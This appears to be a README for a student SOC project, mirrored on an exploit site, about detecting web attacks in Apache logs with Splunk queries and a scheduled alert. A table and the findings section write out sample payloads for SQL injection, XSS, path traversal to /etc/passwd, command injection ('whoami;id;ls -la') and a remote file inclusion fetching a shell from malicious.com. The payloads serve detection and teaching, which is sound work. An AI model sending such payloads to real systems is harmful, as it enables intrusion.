Share
## https://sploitus.com/exploit?id=14977086-DBF7-5E28-AF87-DC659317A328
# ๐ Web Application Attack Detection & Threat Hunting Using Splunk





> A full SOC analyst workflow โ log ingestion, SIEM troubleshooting, threat hunting, detection engineering, alert creation, and IOC identification โ built end-to-end in Splunk Enterprise.
---
## ๐ Table of Contents
- [Project Overview](#project-overview)
- [Environment](#environment)
- [Attack Coverage](#attack-coverage)
- [Key Findings](#key-findings)
- [Detection Logic](#detection-logic)
- [Indicators of Compromise](#indicators-of-compromise)
- [Alert Configuration](#alert-configuration)
- [Repository Structure](#repository-structure)
- [Skills Demonstrated](#skills-demonstrated)
---
## Project Overview
This project simulates a real-world Security Operations Center (SOC) engagement using Splunk Enterprise to ingest, parse, and analyze malicious web application traffic from an Apache-style access log.
**Key outcomes:**
- Processed **248,664 events** across a full web attack dataset
- Identified **24 unique IP / attack-type combinations** via detection query
- Flagged a **potentially successful RCE attempt** (HTTP 200 response to command injection)
- Built and scheduled a **Critical Web Attack Detection** alert running every 1 minute
---
## Environment
| Component | Details |
|-----------------|--------------------------------------|
| SIEM Platform | Splunk Enterprise 10.2.3 |
| Operating System | Windows |
| Data Source | `access_log.txt` |
| Sourcetype | `access_combined` |
| Index | `main` |
| Log Type | Web Server Access Logs (Apache CLF) |
---
## Attack Coverage
| Attack Type | Example Payload | Risk Level |
|----------------------------------|----------------------------------------------------|-------------|
| SQL Injection (SQLi) | `/search?query=' OR '1'='1` | ๐ด Critical |
| Cross-Site Scripting (XSS) | `/profile.php?name=alert('XSS')` | ๐ High |
| Directory Traversal / LFI | `/download?file=../../../../etc/passwd` | ๐ด Critical |
| Command Injection / RCE | `/exec.php?cmd=whoami;id;ls -la` | ๐ด Critical |
| Remote File Inclusion (RFI) | `/page.php?url=http://malicious.com/shell.txt` | ๐ด Critical |
| Reconnaissance / Automated Scan | Nmap Scripting Engine, sqlmap | ๐ก Medium |
---
## Key Findings
### โ ๏ธ Critical โ Potential Successful Exploitation
```
GET /exec.php?cmd=whoami;id;ls -la HTTP/1.1" 200
```
HTTP 200 returned for a command injection payload โ indicates the target application may have **accepted and executed** remote commands. This warrants immediate escalation and forensic investigation.
### Attacker Behavior Pattern
- External IPs performed automated scanning followed by targeted injection
- Internal IP `10.0.0.5` exhibited suspicious command injection activity (insider threat or lateral movement)
- `sqlmap` and `Nmap` user-agents confirm tooling-assisted exploitation attempts
---
## Detection Logic
The core SPL query is in [`queries/web_attack_detection.spl`](queries/web_attack_detection.spl).
**Logic overview:**
1. Filter events from the web log source containing attack signatures
2. Extract source IP via `rex` field extraction
3. Classify each event into an attack category via `eval/case`
4. Aggregate by `src_ip` and `attack_type` for triage
**Index validation query** (used during SIEM troubleshooting):
```spl
index=* | stats count by index sourcetype source host
```
---
## Indicators of Compromise
### Suspicious IP Addresses
| IP Address | Activity |
|-------------------|----------------------------------|
| `185.199.110.153` | Command Injection / RFI / LFI |
| `37.49.226.150` | SQL Injection / Recon |
| `192.168.1.101` | SQLi / XSS / LFI |
| `10.0.0.5` | Internal โ Command Injection |
### Suspicious User Agents
- `sqlmap/1.4.5-dev`
- `Nmap Scripting Engine`
Full IOC reference โ [`iocs/indicators.md`](iocs/indicators.md)
---
## Alert Configuration
| Parameter | Value |
|-----------------|------------------------------------|
| Alert Name | Critical Web Application Attack Detection |
| Alert Type | Scheduled |
| Schedule | Every 1 minute |
| Search Window | Last 5 minutes |
| Trigger | Number of Results > 0 |
| Severity | High / Critical |
---
## Repository Structure
```
splunk-web-attack-detection/
โโโ README.md # This file
โโโ queries/
โ โโโ web_attack_detection.spl # Primary detection query
โ โโโ validation_query.spl # Index/sourcetype validation
โโโ docs/
โ โโโ SOC_Report.md # Full SOC analyst report
โโโ iocs/
โ โโโ indicators.md # IP addresses, user agents, payloads
โโโ screenshots/ # Evidence: query results, alert config
โโโ detection_query_results.png
โโโ statistics_view.png
โโโ alert_creation.png
โโโ triggered_alerts.png
```
---
## Skills Demonstrated
| Domain | Specifics |
|---------------------------|----------------------------------------------------|
| SIEM Operations | Splunk log ingestion, index validation, troubleshooting |
| Detection Engineering | SPL query development, regex extraction, eval logic |
| Threat Hunting | Pattern analysis, behavioral clustering |
| IOC Analysis | IP attribution, user-agent fingerprinting |
| Alert Development | Scheduled alerts, trigger thresholds |
| Incident Response | RCE triage, escalation criteria, HTTP status analysis |
| Web Attack Analysis | SQLi, XSS, LFI, RFI, RCE, Recon |
---
## Related Projects
- [GRC & Risk Assessment Portfolio](https://github.com/) *(link your other repos)*
- [AWS Cloud Security โ NIST CSF Implementation](https://github.com/)
---
*Prepared by **Dunsin Fakorede** | SOC Analyst / Cybersecurity Learner*